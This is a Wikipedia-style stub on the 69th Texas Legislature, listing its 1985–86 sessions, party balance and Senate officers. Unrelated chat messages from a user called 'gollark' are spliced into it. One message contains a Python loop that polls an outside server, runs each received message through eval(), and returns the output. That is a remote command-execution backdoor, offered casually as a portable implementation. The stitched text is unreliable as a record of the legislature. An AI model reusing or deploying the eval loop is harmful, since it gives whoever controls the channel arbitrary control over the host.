Sixty-ninth Texas Legislature

The 69th Texas Legislature met in regular session from January 8, 1985, to May 27, 1985, and in three subsequent special called sessions (see below). All members present during this session were elected in the 1984 general elections.

Sessions

Regular Session: January 8, 1985 - May 27, 1985
1st Called Session: May 28, 1985 - May 30, 1985
2nd Called Session: August 6, 1986 - September 4, 1986
3rd Called Session: September 8, 1986 - September 30, 1986

Party summary

Senate

Affiliation Members Note
  Democratic Party 25
  Republican Party 6
Total 31

House

Affiliation Members Note
  Democratic Party 95
  Republican Party 55
Total 150

Officers

Senate

  • Lieutenant Governor: William P. Hobby, Jr., Democrat
  • President Pro Tempore (regular session): Ray Farabee, Democrat
  • President Pro Tempore (1st called session): Carlos Truan, Democrat
  • President Pro Tempore (2nd called session): Carlos Truan, Democrat
  • President Pro Tempore (3rd called session): Carlos Truan, Democrat

House

Members

Senate

House

gollark: Well, OmniDisks are revoked via the web license lookup thing.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```As you can see, this is much more portable than the old SPUDNET Python implementation, which needed websockets and asyncio and such.
gollark: I was thinking about this, but I don't actually have all the hashes of all the disks in circulation.
gollark: It has some great new features now, like long polling mode.
gollark: You mean SPUDNET? I think I may have broken that URL in the osmarks.net migration. Use spudnet.osmarks.net.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.